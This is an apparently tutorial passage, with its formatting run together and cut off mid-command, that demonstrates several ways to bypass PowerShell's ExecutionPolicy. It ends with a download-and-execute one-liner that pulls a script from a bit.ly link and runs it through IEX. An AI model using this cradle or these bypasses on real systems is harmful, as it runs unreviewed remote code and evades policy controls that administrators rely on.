To demonstrate this fact to you, we have included some examples to bypass the ExecutionPolicy. Some might need elevated rights, and some not:
#1 Execute the code from an Interactive PowerShell ConsoleWrite-Host -Message "this is my evil script"#2 Pipe the echoed script to PowerShell Standard InEcho "Write-Host 'this is my evil script'" | PowerShell.exe -noprofile #3 Read from file and pipe to PowerShell Standard In#Example 1: Get-Content MyScript.ps1 | PowerShell.exe -noprofile #Example 2: TYPE MyScript.ps1 | PowerShell.exe -noprofile#4 Download Script from URL and use IEXpowershell -nop -c "iex(New-Object Net.WebClient).DownloadString('http://bit.ly/e0Mw9w')"iex (New-Object Net.WebClient).DownloadString("http://bit.ly/e0Mw9w" ...